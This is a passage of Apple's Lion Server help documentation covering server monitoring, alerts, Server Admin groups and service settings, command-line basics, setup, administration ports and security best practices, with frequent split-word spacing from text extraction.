Monitor serv ers
Monitor server stats

Use the Stats pane of the Server app to get a picture of s erver activity over time. You can find out when the s erver is likely to be bus y, whether its operating near capacity, and when its likely to be least us ed.
Choose a type of activity and a time period from the pop-up menus. Processor Usage: Monitor the workload of the servers processor or process ors. Memory Usage: See how much memory the s erver has been using. Network Traffic: Track how much incoming and outgoing data the server transfers over the network. You can also monitor server activity by using the Server Status widget on the server or on another computer. For information, see Use the Server Status widget. If the server has a display, you can use Activity Monitor (in the Utilities folder in Launchpad) on the server. Activity Monitor shows the proces ses and applications currently open on the computer. You can us e Activity Monitor to monitor short-term processor workload, disk activity, and network activity. For information, see Activity Monitor Help.
The Serv er app
Monitor serv ers
Track server alerts

You can us e the Server app to view mes sages about important events that have occurred on the server. Each alert mes sage notes when the event occurred, briefly describes the event, outlines available recovery options for resulting problems , and may assist you in recovery. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email viruses, and network configuration changes. View alerts and resolve resulting problems 1. To view a list of alerts, s elect Alerts in the Server sidebar. Alerts you havent viewed are displayed in bold. 2. To view the description and recovery options for an alert, select the alert in the list, and then choose View Alert from the Action pop-up menu. You can also view an alert by double-clicking it in the list. 3. To recover from a problem as sociated with the alert, use the controls or follow the ins tructions under the Recovery Options heading. Clear all alerts Select Alerts in the Server sidebar, and then choose Clear All from the Action pop-up menu.
The Serv er app
Monitor serv ers
Change the email address for server alerts

You can us e the Server app to change the email addresses Lion Server sends alerts to. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email sus pected of having a virus , and network configuration changes.
1. Select Alerts in the Server sidebar. 2. Choose Configure Email Addresses from the Action pop-up menu. 3. Enter the email address you want alerts sent to, or enter multiple email address es separated by commas.
The Serv er app
Monitor serv ers
Use the Server Status widget

You can us e the Server Status widget to monitor the status of Lion Server, either on the s erver itself or from another computer with Mac OS X Lion.
1. Open Dashboard, and look for the Server Status widget. You can open Das hboard by clicking its icon in Launchpad or pressing its keyboard s hortcut, which is usually the F12 key. If you dont see the Server Status widget in Dashboard, click Dashboards Open button (+), and then click or drag the Server Status widget from the widget bar. You can us e multiple Server Status widgets to see more than one as pect of a servers status at once or to monitor other s ervers on the network. For more information, search Mac Help for Dashboard and widgets. 2. If you see the Server, Us er Name, and Pass word fields, enter the servers DNS name or IP address followed by an administrator name and password, and then click Done. 3. When the Server Status widget is connected to a server, it displays a graph and other status information about the server and its s ervices . You can: Monitor proces sor usage, network load, or disk usage by clicking an icon below the graph. Change the process or or network graphs time period to one hour, day, or week by clicking the graph. If your s erver has more than one disk, view the status of each disk in turn by clicking the dis k usage graph. Check the status indicator and activity statis tics for the listed s ervices . A green indicator means the service is running. Connect to a different server by moving the mouse to the upper-left corner of the widget and clicking the Info button (i).
RELATED TOPICS
Check server status Monitor s erver stats
The Serv er app
Close the Server app connections

For security, you can close the Server app window when you arent actively using it to manage users, groups, services , or system information. Leaving a server connection open on an unattended server makes it eas ier for an unauthorized person to make changes to users, groups, or s ervices .
You can close the Server app connections by doing any of the following: Close the Server app window. Choos e Manage > Close. Quit the Server app.
The Serv er app
Reduce the use of administrator accounts

For security, create a us er account that isnt an administrator account, and use that account when you dont need administrator privileges. Limit the number of people with administrator privileges . If you have enabled the root user and no longer need it, disable it.
1. Create a standard user account in the Users & Groups pane of Sys tem Preferences on the s erver. 2. In the servers login window, use a s tandard us er account instead of an administrator account. 3. Use your administrator account with any application that requires administrator privileges. For example, use your adminis trator name and pass word with the Server app when you need to manage users, groups, or services. The new user account also appears in the Users pane of the Server app, and it can be used to acces s services provided by your server from a us ers computer on the network.
The Serv er app
If users cant access a service via the Internet

If users can acces s a service on the local network but not via the Internet, try these solutions. If you have an Internet router, you may need to configure port forwarding (also known as port mapping) on it. For more information, see Router port mapping. If your s erver is managing an AirPort device, s elect it in the Server sidebar and make sure the desired service is lis ted under Public Services. For more information, see Manage AirPort port mapping and Wi-Fi login. Make sure your s ervers Internet host name is registered on the Internet, and check the DNS server configuration on the us ers computer. For more information, see Register the servers Internet hos t name, and search Mac Help for Tes t your DNS s erver.
Serv er Admin
Serv er Admin UI Reference
Server Admin main window description

The Server Admin interface is shown here, with each element explained in the table.
Server list T his shows servers, groups, smart groups, and if needed, administered services for each server. You select a group to view a status summary for grouped computers. You select a computer for its overview and server settings. You select a servers service to control and configure the service.
T ool bar T his shows available context buttons for configuration panes. If a button is grayed out or cant be clicked, you do not have administrative permissions to access it. Main work area T his shows status and configuration options. T his looks different for each service and for each context button selected.
All servers T his shows computers added to Server Admin, regardless of status.
Available servers T his lists the local-network scanner, which you can use to discover servers to add to your server list. Server T his shows the hostname of the managed server. Select to show asummary that includes a hardware, operating system, active service, and system status.
Service T his shows an administered service for a server. Select to get service status, logs, and configuration options. Green indicates a running service.
Group T his shows an administrator-created group of servers. Select to view a status summary for grouped computers. For more information, see Add a server group.
Smart group T his shows an automatic group, populated with servers that meet a predetermined criteria. For more information, see Add a smart group.
Add button T his shows a pop-up menu of items to add to the Server list: servers, groups, and smart groups. Action button T his shows a pop-up menu of actions possible for a selected service or server, including disconnect server, share the servers screen, and so forth. Refresh button T his allows you to send a status request to computers in the Server list. Service start/stop button When a service is selected, this button allows you to start or stop the service, as relevant.
Serv er Admin
Server Admin consolidated server view

The Server Admin interface is shown here, with each element explained in the table.
Server list T his shows servers, groups, smart groups, and if needed, the administered services for each server. You select a group to view a status summary for grouped computers. You select a computer for its overview and server settings. You select a servers service to control and configure the service.
Status list T his shows available information that includes: Host name OS version CPU load Network throughput Approximate disk usage Uptime Number of connected file sharing users
All servers T his shows computers added to Server Admin, regardless of status.
Available servers T his lists the local-network scanner, which you can use to discover servers to add to your server list. Server T his shows the hostname of the managed server. Select to show a summary that includes a hardware, operating system, active service, and system status.
Service T his shows an administered service for a server. Select to get service status, logs, and configuration options. Green indicates a running service.
Group T his shows an administrator created group of servers. Select to view a status summary for grouped computers. For more information, see Add a server group.
Smart group T his shows an automatic group, populated with servers that meet a predetermined criteria. For more information, see Add a smart group.
Add button T his shows a pop-up menu of items to add to the Server list: servers, groups, and smart groups. Action button T his shows a pop-up menu of actions possible for a selected service, or server, including disconnect server, share the servers screen, and so forth. Refresh button T his allows you to send a status request to computers in the Server list.
Serv er Admin
Server Admin preference pane

This pane provides a list for Server Admin application preferences which are explained in the following table.
Preference Require valid digital signature (SSL)
Default
Description T his ensures that the server uses a valid SSL certificate for encryption.
Try to resolve IP addresses to DNS names Use computer name in list
On
T his performs a DNS lookup for IP addresses. T his uses the Mac OS computer name instead of the host name.
Expand new server in list on login
On
T his shows all services enabled for administration in the server list.
Show icons in file browser
In the Sharing pane, this shows the icon and the file name.
Show system accounts in users and groups browser
T his shows users and groups that are hidden because they belong to operating system
processes. Don't warn if a service port is blocked by firewall On T his skips a check on the IP firewall when saving service port number preferences. Alert user on server errors On T his provides additional information for basic server errors. Auto-refresh status every ___ seconds List a maximum of ___ users or groups 60 100 T his sets the poll frequency for status updates. T his limits the number of users or groups shown in the user and group drawer.
Serv er Admin
Server settings reference

The Settings pane of Server Admin has configuration options for a server. The s ettings include additional s ervices , network settings, time services, and adminis tration options . After selecting the server, you s elect the Settings pane for the following options:
Section General Contains Additional services for remote contact and monitoring. Services include NTP, SNMP, SSH, and Remote Desktop managment. General pane'>Sample Screen. Network Date and Time Server names and a network interface list. Network pane'>Sample Screen. Settings time zones, and automatic time. Date & Time pane'>Sample Screen. Alerts Options for what conditions trigger an email to an administrator. Alerts pane'>Sample Screen. Services A list of services that can can be shown in Server Admin for administration. Services pane'>Sample Screen.
RELATED INFORMATION
Control access to services Import and export Server Admin preferences Import and export service s ettings Add or remove s ervices in the server view
Serv er Admin
Get more server instructions

You can find configuration and reference information for services found in Server Admin by visiting the Lion Server resource page.
Serv er Admin
Using Serv er Admin
Add servers and server groups

Add s ervers to Server Admin to control and configure them, and group them to find and organize them. Add a server Add s ervers to Server Admin to control and configure them. The s ervers you can adminis ter using Server Admin appear in the Servers list on the left side of the application window. Add the server to the Servers lis t and log in to it in one of two ways :
Click Add (+) in the bottom action bar and choose Add Server. Choose Server > Add Server from the menu bar. Add a server group Server Admin displays computers in groups in the Server List s ection of the application's window. The default s erver group is called All Servers. This is a list of administered computers that you have added and authenticated to. You can create other groups to organize the computers on your network. You can make more s pecific, targeted groups of servers from your All Servers list. First, create blank lis ts and then add servers from the All Servers list. You can do the following with s erver groups : Create as many groups as you want Add s ervers to more than one lis t Group lis ts according to geographic region, functionality, hardware configuration, and even color You can click a group name to see a s tatus overview of servers in the group. 1. Under the Server list at the bottom of the Server Admin window, click Add (+). 2. Select Add Group and name the group. To rename groups , click the group and let the mouse hover over the name for a few seconds . When the name becomes editable, rename the group. 3. Drag the servers from the All Servers group to the new group.
RELATED INFORMATION
Smart group criteria
Serv er Admin
Using Serv er Admin
Add a smart group

You can create a server list that populates based on cus tom criteria. This is referred to as a smart group. Server Admin displays computers in groups in the Server List s ection of the application's window. The default server lis t is called the All Servers list. This is a list of adminis tered computers that you have added and authenticated to. You can match the following criteria: Visible services Running services Network throughput CPU utilization IP address OS version
1. Under the Server list at the bottom of the Server Admin window, click Add (+). 2. Select Add Smart Group. 3. Name the smart group. 4. Define the criteria for servers to appear in the list and click OK. The group appears in the Server list.
RELATED INFORMATION
Serv er Admin
Using Serv er Admin
Remove servers, server groups, and smart groups

You can remove a s erver, s erver group, or s mart group from the Servers list. If a server in the Servers lis t appears gray, double-click the server or click the Connect button in the toolbar to log in again. To enable auto-reconnect the next time you open Server Admin, select Remember this pas sword in my keychain while you log in.
1. Select the item to remove. 2. If it's a s erver, disconnect from the server: Click the Perform Action button in the bottom action bar and choose Disconnect. Choose Server > Disconnect from the menu bar. 3. Remove the item you've selected: If it's a server, click the Perform Action button in the bottom action bar and choos e Remove Server, or choos e Server > Remove Server from the menu bar. If it's a group or server group, click the Perform Action button in the bottom action bar and choose Remove Group, or press Delete on the keyboard.
RELATED INFORMATION
Serv er Admin
Using Serv er Admin
Edit a server group

After you make a s erver group, you can add, s ubtract, or reorder s ervers in the group.
To rename groups , us e the normal Mac file renaming method: 1. Click the group and let the mous e hover over the name for a few seconds. 2. When the name becomes editable, rename the group. To add servers to the group, drag the servers from the All Servers group to the new group. To remove servers from the group, select the servers and press Delete. To rearrange s ervers in a group, drag a server in the list and drag it to a new place in the list.
RELATED INFORMATION
Serv er Admin
Using Serv er Admin
Edit a smart group

After making a smart group, you can change the name and filter criteria. You can match the following criteria: Visible services Running services Network throughput CPU utilization IP address OS version
1. Double-click the smart group to edit. 2. Rename the smart group, if needed. 3. Edit the criteria that orders how s ervers appear in the list and click OK. The group appears in the Server list.
RELATED INFORMATION
Serv er Admin
Using Serv er Admin

After you create a smart group, a s erver added to the All Server lis t (or other specified list) that matches the criteria is added to the smart group. You can match the following criteria: Visible services Running services Network throughput CPU utilization IP address OS version
RELATED INFORMATION
Add s ervers and s erver groups Add a s mart group Remove servers , server groups, and smart groups Edit a s erver group Edit a s mart group
Serv er Admin
Using Serv er Admin
Add or remove services in the server view

Before you can set up s ervices using Server Admin, you must add the service to the s erver view. For example, by default, no services can be s een for your server. As you select services to administer, configuration panes become access ible in a lis t underneath your computer name. When you select s ervices from the list, thos e services appear underneath the server hos tname in the s erver list. Services available for administration are: DHCP DNS Firewall Mail NAT NetBoot Open Directory Podcast Producer Push Notify (when adminis tering Snow Leopard Server remotely) RADIUS
Software Update Xgrid
1. In Server Admin, select a server. 2. Click the Settings button in the toolbar and then click the Services tab. 3. To add a service, s elect the checkbox for the service. 4. To remove a service, deselect the checkbox for the service.
RELATED INFORMATION
Server settings reference Server Admin available services
Serv er Admin
Serv ice settings
Control access to services

You can us e Server Admin to configure which users and groups can use s ervices hosted by a s erver. You s et up access to services to users and groups using SACLs. You can s et up the same acces s to all services, or you can select a service and customize its access s ettings. Access controls are s imple. Choose between allowing all users and groups to use s ervices or allowing selected users and groups to us e services. You can separately s pecify access controls for individual services, or you can define one set of controls that applies for services hosted by the s erver.
You can also control us er access to several services us ing the Server app. For example, only the Server app can control user access to Podcas t and Time Machine services. For information, see Control a users access to services.
1. Select a s erver in the Servers list. 2. Click Settings, then click Access. 3. Click Services. 4. Choose a service and then choose whether to allow everyone access to it or whether to allow specified users to access the service. 5. If you have chosen to specify users , add the users and groups as needed.
RELATED INFORMATION
Serv er Admin
Serv ice settings
Import and export Server Admin preferences

To copy service settings from one server to another, or to save service settings in a plis t file for reus e later, use the Export Server Admin Preferences command in Server Admin. Us e Import Server Admin Preferences to use them. Import Server Admin preferences To copy Server Admin preferences from one server to another or to save service s ettings in a plist file for reuse later, use the Import Server Admin Preferences command in Server Admin. 1. Select the target server to receive the s ettings. 2. From the menu bar, choose Server > Import > Server Admin Preferences . 3. Find and select the saved s ervice file. The only file you can use with this function is a properly formatted XML-bas ed plist file, generated from the settings export. 4. Click Open. Export Server Admin preferences To copy service settings from one server to another or to s ave s ervice settings in a plist file for reuse later, us e the Export Server Admin Preferences command in Server Admin. 1. Select the server. 2. From the menu bar, choose Server > Export > Server Admin Preferences. 3. Select the services whose settings you want to copy. 4. Click Save. The file that is created contains s ervice configuration information as a plist XML document.
RELATED INFORMATION
Serv er Admin
Serv ice settings
Import and export service settings

The Settings pane of Server Admin has configuration options for a server. The s ettings include additional s ervices , network settings, time services, and adminis tration options . You can move the settings between administrator computers. Import service settings To copy service settings from one server to another, or to save service settings in a plis t file for reus e later, use the Export Service Settings command in Server Admin. 1. Select the target server to receive the s ettings. 2. From the menu bar, choose Server > Import > Service Settings. 3. Find and select the saved s ervice file. The only file you can use with this function is a properly formatted XML-bas ed plist file, generated from the settings export. 4. Click Open. Export service settings To copy service settings from one server to another or to s ave s ervice settings in a plist file for reuse later, us e the Export Service Settings command in Server Admin. 1. Select the server.
2. From the menu bar, choose Server > Export > Service Settings . 3. Select the services whose settings you want to copy. 4. Click Save. The file that is created contains s ervice configuration information as a plist XML document.
RELATED INFORMATION
Using the Command Line
About the command-line environment of Lion Server

A command-line interface (CLI) is an alternative to graphical applications for interacting with and controlling your computer. Lion Server provides graphical applications primarily Server app and Server Adminto addres s common adminis tration tasks. However, there are situations where using the CLI might be appropriate. These s ituations include: Configuring advanced options that arent supported by graphical applications Configuring remotely from a computer that doesnt have Server app or Server Admin installedfor example, a computer with Windows , Linux, or another UNIX-based operating sys tem Performing tasks that are repetitive or that mus t be run at predefined times Editing text files, usually to change advanced configuration settings and preferences The primary way to acces s the CLI in Mac OS X is with the Terminal application. Other ways to access the CLI are discussed in related topics. Each window in Terminal contains an execution context, called a shell, which is s eparate from all other execution contexts. The s hell is an interactive programming language interpreter, with a specialized syntax for executing commands and writing structured programs (shell scripts ). Different shells have slightly different capabilities and programming syntax. Although you can use any shell, the examples in this book us e bash, the startup shell for Mac OS X and the default us er shell. UNIX Mac OS X and Mac OS X Server are built on the foundation of the UNIX operating s ystem. UNIX-based operating systems include BSD, GNU/Linux, AIX, and Solaris. The shared heritage of these operating sys tems means that many programs are compatible acros s this larger family, with minimal changes. The unique underpinnings of each brand of UNIX are what distinguis h them from each other. To s upport programs and utilities that work across multiple flavors of UNIX, some specifications are set by regulatory bodies . One s uch s pecification is The Open Groups Single UNIX Specification. Mac OS X v10.5 and later conform to v3 of this specification, which implies conformance to the SUSv3 and POSIX 1003.1 specifications for the C API, shell utilities , and threads. Code that complies with the UNIX-03 specification works on Mac OS X Server and on other compliant s ystems . For more information about the Single UNIX Specification v3, see www.unix.org/version3/. The shell In UNIX-based operating sys tems, the s hell is the fundamental user interface. The shell is an environment that presents a text prompt to the us er and accepts keyboard input from the user. In Mac OS X, the s hell is easily accessed through Terminal, but there are other options . The shell can be invoked interactively, or by a text file with commands to the shell given in a s tandard format. There are several shells available in Mac OS X, each with its own strengths and capabilities. Shells in Mac OS X include bash, csh, ksh, sh, tcsh, and zsh. For information about these shells , see their man pages.
RELATED INFORMATION
Use the command line to access remote computers
Introducing the command line
Access the shell with the Terminal app
To open Terminal, click the Terminal icon in the dock or in the Utilities folder in Launchpad. Each window in Terminal repres ents another ins tance of a shell process. Terminal pres ents a prompt when its ready to accept a command. The prompt you s ee depends on your Terminal and shell preferences , but it often includes the name of the host youre logged in to, your current working folder, your user name, and a prompt symbol. For example, if a us er named mariah is using the default bas h shell, the prompt appears as: server1:~ mariah$ This indicates that she is logged in to a computer named server1 as the user named mariah, and her current folder is her home folder, indicated by the tilde (~).
Close the shell

To quit a shell sess ion, enter the command exit. This ensures that commands the shell is actively running are closed. If anythings still in progress, the shell warns you.
Execute commands and run tools

To execute a command in the shell, enter the complete pathname of the tools executable file, followed by arguments, and then press Return. If a command is located in one of the shells known folders, you can omit path information and enter the command name. The list of known folders is stored in the shells PATH environment variable and includes the folders containing mos t command-line tools. For example, to run the ls command in the current users home folder, enter the following at the command line and press Return: host:~ mariah$ ls The s hell looks through the list of folders in the PATH variable until it finds a program named ls; in this case, it finds ls in /bin, and runs /bin/ls . To run a command in the current users home folder, precede it with the folder specifier. For example, to run MyCommandLineProg, use the following: host:~ mariah$ ~/MyCommandLineProg To open an application, use the open command: open -a MyProg.app When entering commands, if you get the mess age command not found, check your s pelling. Heres an example: server:/ mariah$ opne -a TextEdit.app -bash: opne: command not found If this error recurs, the command youre trying to run might not be in your default search path. Add the path before the command name: server:/ mariah$ sudo /System/Library/ServerSetup/serversetup getHostname server.example.com or change your working folder to the folder that contains the tool: server:/ mariah$ cd /System/Library/ServerSetup server:/System/Library/ServerSetup mariah$ sudo ./serversetup -getHostname server.example.com or define the path for this ses sion and then run the command: server:/ mariah$ PATH=$PATH:/System/Library/ServerSetup server:/ mariah$ sudo serversetup -getHostname server.example.com
Terminate commands
To terminate the current command, press Control-C. This keyboard shortcut sends an abort signal to the command. In mos t cases this causes the command to terminate, although
commands can install signal handlers to trap this signal and res pond differently.
Specify files and folders

Most commands operate on files and folders , whose locations are identified by paths. The folder names that make up a path are separated by s las hes . For example, the path to the Terminal application is /Applications/Utilities /Terminal.app. Standard s hortcuts used to repres ent specific folders are shown in the following table. They are s pecified relative to the current folder, and can eliminate the need to enter full paths.
Shortcut . Description A single period represents the current folder. For example, the string ./Test.c represents the Test.c file in the current folder. .. T wo periods represent the parent folder of the current folder. For example, the string ../Test represents a sibling folder (named Test) of the current folder. ~[username] T he tilde character represents the home folder of the logged-in user. For example, to specify the Documents folder of the current user, you would specify ~/Documents. T o specify another users Document folder, use their short name preceded by the tilde (~) characterfor example, ~jsmith/Documents. In Mac OS X, this folder is in the local /Users folder or on a network server. For a list of short names on your system, enter dscl
. -list
/Users. Most of these users arent traditional user accounts with home
directories, but you should be able to find the short name of known users on the computer.
File and folder names can include letters, numbers, a period, or the underscore character. Avoid mos t other characters, including space characters. Although s ome Mac OS X file systems permit the us e of these other characters , including spaces, you might need to add single or double quotation marks around pathnames that contain them. For individual characters, you can also escape the characterthat is, put a backslash character immediately before the character in your string. For example, the pathname My Dis k is My Disk or My\ Dis k.
Commands requiring root or administrator privileges

Many commands used to manage a s erver must be executed by an administrator user or the root user. For example, entering server:~ mariah$ shutdown gives you the following error: shutdown: NOT super-user This is becaus e the shutdown command can be run only by the root user or by an administrative user with s pecial privileges. To run commands in this s uper user mode, use the sudo command. sudo stands for s uper user do. The following example works , so dont run it unless you want to restart your computer: server:~ mariah$ sudo shutdown Youll be prompted for the password of the current user. Only us ers designated as admin us ers can execute commands with sudo. If youre logged in as a us er who isnt an admin user, you can substitute users by entering su adminUsername, where adminUsername is the name of a user in the Admin group. After you enter that us ers password, a new s hell is launched from the existing shell, as that user. If a command requires it, you can us e su to log in as the root user. Under normal circumstances you dont need to use the root user account. If you su to the root us er, be es pecially careful, because you have s ufficient privileges to make changes that can cause your server to s top working.
For more information about the sudo and su commands, see their man pages.
Get help for command-line tools

Most command-line documentation comes in the form of man (short for manual) pages. Man pages provide reference information for shell commands, tools, and high-level concepts. To acces s a man page entry, enter $ man command Replace command with the name of the command you want to find information about. The man page contains details about the command, its options and parameters, and proper use. For help using the man command itself, enter $ man man You can press the Space bar to go to the next page, the B key to go back a page, or the Return key to scroll forward one line at a time. Press the Q key to exit the man page. You can search the contents of a man page by pressing the "/" key followed by the word youre looking for. If multiple ins tances are found, us e the P and N keys to access the previous and next instances of the term. If you dont know the name of a man page, you can s earch the topics by entering $ man -k topic Replace topic with a word that would be contained in the description of the man page you might be looking for. For example: $ man -k "directory service" returns references to the dscacheutil, dscl, and whois man pages. You can also find links to related man pages at the bottom of a man page in the See Also section. If Xcode tools are installed, you can view man pages Xcode by selecting Open man page... from the Help menu. There are also s everal third-party graphical Mac OS X applications available for viewing man pages. You can find one by choosing Mac OS X Software from the Apple menu and then searching for man page.
Use the command line to access remote computers

You can run command-line tools on remote computers. There are three methods for connecting to the command-line environment of a remote computer: SSH Apple Remote Destkop (ARD) X11
RELATED INFORMATION
SSH (Secure Shell) Apple Remote Desktop X11
Installation and setup
Installation
Make your Mac a server

If your Mac is nt a server, you can make it one by installing Lion Server. Before following the s teps below to make your Mac a server: Make s ure your Mac has Mac OS X Lion installed. If your Mac has Mac OS X Snow Leopard, you can upgrade it to Lion. For information, see www.apple.com. Check Lion Server requirements
Check your DHCP s ervers configuration Register an Internet host name Cons ider disk preparation options
1. On the Mac you want to make a s erver, open the Mac App Store, and get Mac OS X Lion Server. The Server app is installed and opens automatically. 2. Click Configure in the Welcome to Server window, and then follow the onscreen instructions to begin installing and setting up Lion Server s oftware. After you enter the name and pas sword of an administrator account on your Mac, the Server app downloads additional Lion Server software, installs it, and configures your Mac as a s erver.
RELATED TOPIC
After setting up Lion Server
Installation
Types of installation
There are three ways to ins tall Lion Server. Install Server components on Lion This method works after Lion is installed over a client vers ion of Snow Leopard. If you need Lion Server-compatible versions of the advanced administration tools, you can download them from AppleCare support. Install Lion Server over Snow Leopard Server If you have an exis ting Snow Leopard Server installation, you can purchase and install Lion from the Mac App Store. The Mac App Store allows you to install both Lion and the Server components as a s ingle unit. After Lion Server is installed over Snow Leopard Server, the Snow Leopard Server advanced administration tools (Server Admin, Workgroup Manager, and others) are deleted. If you need Lion Server-compatible versions of advanced adminis tration tools, download them from AppleCare support. Clean Installation This method begins with starting a Lion Server installation. Instead of choosing a dis k partition with an existing operating system on it, you install Lion Server on a blank disk partition. You get a clean ins tall of Lion Server and you can configure the s erver from scratch.
Setup
Set up a server remotely

If you have a new server or a computer with Lion Server newly ins talled, you can s et it up over the network by using the Server app on an adminis trator computer. The server youre setting up doesnt need a display.
1. Prepare your DHCP server for the new s erver, and if you have a DNS server, prepare it also. If you have an Internet router, its probably your DHCP server. Your DNS s erver may be adminis tered by your Internet service provider or a DNS hos ting s ervice, or it may be another s erver on your intranet. For more information, see DHCP server configuration for your server and Register the servers Internet host name. 2. Make sure the new server has an active connection to the same network as the administrator computer youre using. 3. If the server is off, turn it on. When the s erver starts up, the server s etup ass istant opens and waits for setup to begin. 4. On your administrator computer, open the Server app, choose Manage > Connect to Server, select the new server in the
Choose a Mac dialog, and click Continue. The new server may be listed with a name generated from the computer model and the Ethernet hardware addres s (the MAC address), or with a name from your DNS s erver. If the server you want to set up is listed in the Server app sidebar, you can begin setup by selecting it and clicking Set Up This Mac. 5. Enter the new servers complete hardware serial number. You can find the serial number on the case of the product, on the original product packaging, and on the original product receipt or invoice. For more information about finding the s erial number, see the Apple Support article at support.apple.com/kb/HT1349. Match the capitalization of the s erial number when you type it. 6. Click Continue, and proceed through the s erver setup as sistant panes. After server s etup is complete, you can take additional steps to enhance the s ecurity, accessibility, and overall usefulness of your new server. For information, see After setting up Lion Server.
RELATED TOPIC
Prepare an adminis trator computer
Setup
About AutoServerSetup.plist
Automatic server setup is not s upported in Lion Server. WARNING: Your existing AutoServerSetup.plist may continue to function normally, or it may cause unintentional configuration. If you perform a clean installation, Server Ass is tant finds and tries to apply the s ettings in the plist file. If you perform a clean installation and run the Server Assistant locally, a file at /System/Library/ServerSetup/AutoServerSetup.plist contains the setup data for the server. This file can be reused only with other clean installations of Lion Server. WARNING: This method of server configuration is not supported, and may not function as intended.
Setup
Ports used for administration

For Apple's adminis tration applications to function, s pecific ports must be enabled. In addition, other ports must be enabled for each service you want to run on your s erver.
Port number and type 22 T CP 311 TCP 625 TCP 389, 686 TCP 4111 TCP Tool used SSH command-line shell Server Admin (with SSL) Workgroup Manager Directory Xgrid Admin
Setup
Ports open by default

After manual s etup, the firewall is off by default, and therefore all ports are open. When the firewall is on, all ports are blocked except the following for all originating IP addres ses:
Port number and type 22 T CP 311 TCP 626 UDP 625 TCP ICMP incoming and outgoing 53 UDP
Serv ice SSH command-line shell Server Admin (with SSL) Serial number support Remote Directory Access standard ping host name resolution
Setup
After setting up Lion Server

After completing initial s etup of Lion Server, you can take s teps to enhance the security, accessibility, and usefulnes s of your new server. Enhance the security, access ibility, and usefulness of your new server by following the advice in the Next Steps s ection of the Server app. Install available updates to Lion Server by using Software Update. So us ers can authenticate for s ervices , do either or both of the following: Create user accounts on your server. Connect to a network account server (also called a directory s erver) in your organization to let people use their existing accounts . Turn on and customize services you want to provide, view server information and change it as needed, and track server alerts. Allow access to services over the Internet by doing either or both of the following: To make specific services publicly available on the Internet, configure port mapping on your AirPort device or other router. To let users securely access all services via the Internet without making services publicly available, use VPN s ervice. Protect the information on your Mac by using a strong adminis trator pass word, s ecuring the server when its idle, reducing the us e of adminis trator accounts, and logging out when you finish using an administrator account. For instructions, search Mac Help for Protect the information on your Mac.
Planning and best practices
Planning server usage

Installation planning is especially important if youre integrating Lion Server into an existing network or preparing to set up multiple servers . But even single-server environments can benefit from a brief as ses sment of the needs you want a s erver to address. The major goals of the planning phase are to make sure that: Server user and administrator needs are addres sed by the servers you deploy Server and s ervice prerequis ites that affect installation and initial setup are identified Use thes e topics to stimulate your thinking. They don't present a rigorous planning guide, nor do they provide the details you need to determine whether to implement a service and as ses s its resource requirements. Ins tead, view these topics as an opportunity to think about how to maximize the benefits of Lion Server in your environment. Planning, like des ign, isnt a linear process . The topics don't require you to follow a mandatory s equence. Different topics present suggestions that could be implemented simultaneously or iteratively.
RELATED TOPICS
Setting up a planning team Identifying servers to set up Unders tanding physical infrastructure requirements Determining services to host on each server Ens uring proper operational conditions Minimize the need to relocate s ervers after setup About load balancing
Eliminating single points of failure

To improve the availability of your server, reduce or eliminate single points of failure. A single point of failure is any component in your server environment that, if it fails, causes your s erver to fail. Some single points of failure include: Computer system Hard disk Power supply Although it is almos t impos sible to eliminate all single points of failure, minimize them as much as poss ible. For example, using a backup computer and a file s torage pool for Lion Server eliminates the computer as a single point of failure. Although master and backup computers can fail at once or one after the other, the possibility of such an event happening is negligible. Another way to prevent a computer from failing is to use a backup power source and take advantage of hardware RAID to mirror the hard disk. With hardware RAID, if the main disk fails, the s ystem can still access the same data on the mirror drive, as is the case with Xserve.
Minimize the need to relocate servers after setup

Before setting up a server, try to place it in its final network location (IP subnet). If youre concerned about preventing unauthorized or premature access during setup, set up a firewall to protect the server while finalizing its configuration. If you cant avoid moving a server after initial setup, you mus t change s ettings that are sensitive to network location before you can use the s erver. For example, the servers IP address and hos t name, s tored in directories and configuration files on the s erver, must be updated.
Minimize the time the server is in its temporary location s o the amount of information to change is limited. Pos tpone configuring services that depend on network s ettings until the server is in its final location. Such services include Open Directory replication, Apache settings (such as virtual domains), DHCP, and other network infrastructure s ettings that other computers depend on. Wait to import final user accounts. Limit accounts to test accounts s o you minimize the us er-specific network information (such as home folder location) that you must change after the move. After you move the server, you can change its IP address in the Network pane of Sys tem Preferences (or us e the networksetup tool). You probably will need to manually adjust service and system settings. For more information on how to do this, s ee Understanding changes to the server IP addres s or network identity. Reconfigure the search policy of computers (such as user computers and DHCP servers ) that are configured to use the server in its original location.
About load balancing

One factor that can cause s ervices to become unavailable is server overload. A server has limited res ources and can service a limited number of reques ts s imultaneous ly. If the server gets overloaded, it slows down and can eventually cras h. One way to overcome this problem is to dis tribute the load among a group of servers (a server farm) us ing a third-party loadbalancing device. Clients s end requests to the device, which then forwards the request to the first available s erver based on a predefined algorithm. The clients see only a single virtual addres s, that of the load-balancing device. Many load-balancing devices als o function as switches, providing two functions in one, which reduces the amount of hardware you need to use. Note: A load-balancing device must be able to handle the aggregate (combined) traffic of the s ervers connected to it. Otherwise, the device becomes a bottleneck, which reduces the availability of your s ervers. Not all services are conducive to load balancing even with a third party product. For those that are you may need shared s torage in order for it to be effective. Load balancing provides several advantages : High availability: Distributing the load among multiple servers helps you reduce the chances that a server will fail due to server overload. Fault tolerance: If a server fails , traffic is trans parently redirected to other servers. There might be a brief disruption of service if, for example, a server fails while a user is downloading a file from s hared storage, but the us er can reconnect and res tart the file download process. Scalability: If demand for your services increases , you can transparently add more servers to your farm to keep up with demand. Better performance: By sending requests to the leas t-busy servers, you can respond faster to user requests.
Security best practices

Server administrators must make sure that adequate security measures are implemented to protect a server from attacks. A compromised server risks the resources and data on the server and risks the res ources and data on other connected systems. The compromised system can then be used as a base to launch attacks on other s ystems inside or outside your network. Security best practices Securing s ervers requires an asses sment of the cost of implementing s ecurity with the likelihood of a successful attack and the impact of that attack. It is not pos sible to eliminate all security risks but it is possible to minimize risks to efficiently deal with them. Bes t practices for server system administration include the following: Update your sys tems with critical security patches and updates . Check for updates regularly. Install antivirus tools, use them regularly, and update virus definition files and software regularly. Although viruses are less prevalent on the Mac platform than on Windows, virus es still pose a risk. Restrict physical access to the s erver. Because local access generally allows an intruder to bypas s most s ystem security, secure the server room, server racks, and network junctures. Us e security locks. Locking your systems is a prudent thing to do. Make s ure there is adequate protection from physical damage to servers and ensure that the climate control functions in the server room. Take additional precautions to secure s ervers. For example, enable firmware pas swords, encrypt pass words where possible, and secure backup media. Secure logical access to the server. For example, remove or disable unnecessary accounts. Accounts for outside parties should be disabled when not in use. Configure SACLs as needed. Use SACLs to specify who can access services.
